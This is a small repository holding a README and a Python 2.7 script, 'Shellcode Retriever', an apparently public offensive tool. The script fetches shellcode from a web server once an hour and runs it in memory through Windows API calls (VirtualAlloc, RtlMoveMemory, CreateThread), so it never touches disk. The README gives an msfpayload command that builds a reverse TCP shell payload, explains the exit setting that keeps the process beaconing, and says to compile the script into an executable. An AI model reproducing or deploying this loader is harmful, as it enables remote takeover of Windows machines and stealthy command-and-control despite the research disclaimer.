├── README.md
└── shellcode_retriever.py

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------

## Shellcode Retriever

Downloads win32 shellcode from webservers and executes the shellcode without it touching disk (using the following method: http://www.debasish.in/2012_04_01_archive.html)

Modified for threading by yours truly.

Original demo video:

http://www.youtube.com/watch?v=R15B2p-uWKY

---

For use by IT Security professionals and researchers.

Usage:

Create shellcode using the following msfpayload command:

    msfpayload windows/shell_reverse_tcp LHOST=192.168.0.1 LPORT=8080 EXITFUNC=thread R > test.txt

Notice the exit function: it is very important if you want the process to keep running and beacon out based on the timeouts in the source code.

Upload the shellcode to your webserver.

Compile the python code to an executable by using pyinstaller.

---

## License: GPLv3

Shellcode Retriever

Author Joshua Pitts the.midnite.runr 'at' gmail com

Copyright (C) 2013, Joshua Pitts

License: GPLv3

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

See for a copy of the GNU General
Public License

This program is to be used for only legal activities by IT security
professionals and researchers. Author not responsible for malicious
uses.
--------------------------------------------------------------------------------
/shellcode_retriever.py:
--------------------------------------------------------------------------------

```python
#!/usr/bin/env python2.7

'''
A threaded version of @midnite_runr's shellcode_retriever script (https://github.com/secretsquirrel/shellcode_retriever)

This payload is available in Veil-Evasion (https://github.com/Veil-Framework/Veil-Evasion/blob/master/modules/payloads/python/shellcode_inject/download_inject.py)

If injecting Meterpreter shellcode, remember to specify 'thread' as the EXITFUNC in the handler
'''

from threading import Thread
from urllib2 import build_opener
from ctypes import windll, c_int, c_char, pointer
from time import sleep

timesleep = 3600                 # seconds between fetches
shellcode_url = 'URL_GOES_HERE'  # web server the shellcode is downloaded from
opener = build_opener()


def allocate_exe(shellcode):
    """
    ctypes VirtualAlloc, RtlMoveMemory, and CreateThread
    From http://www.debasish.in/2012_04_01_archive.html
    """
    # Allocation type 0x3000 = MEM_COMMIT | MEM_RESERVE,
    # protection 0x40 = PAGE_EXECUTE_READWRITE
    ptr = windll.kernel32.VirtualAlloc(c_int(0),
                                       c_int(len(shellcode)),
                                       c_int(0x3000),
                                       c_int(0x40))

    buf = (c_char * len(shellcode)).from_buffer(shellcode)

    windll.kernel32.RtlMoveMemory(c_int(ptr),
                                  buf,
                                  c_int(len(shellcode)))

    ht = windll.kernel32.CreateThread(c_int(0),
                                      c_int(0),
                                      c_int(ptr),
                                      c_int(0),
                                      c_int(0),
                                      pointer(c_int(0)))

    # -1 == INFINITE: block this worker thread until the shellcode thread exits
    windll.kernel32.WaitForSingleObject(c_int(ht), c_int(-1))


def get_and_execute(url):
    info = opener.open(url)
    shellcode = info.read()
    shellcode = bytearray(shellcode)
    allocate_exe(shellcode)


def main():
    while True:
        try:
            t = Thread(name='get_and_execute', target=get_and_execute, args=(shellcode_url,))
            t.setDaemon(True)
            t.start()

            sleep(timesleep)
        except Exception:
            pass


if __name__ == "__main__":
    main()
```
--------------------------------------------------------------------------------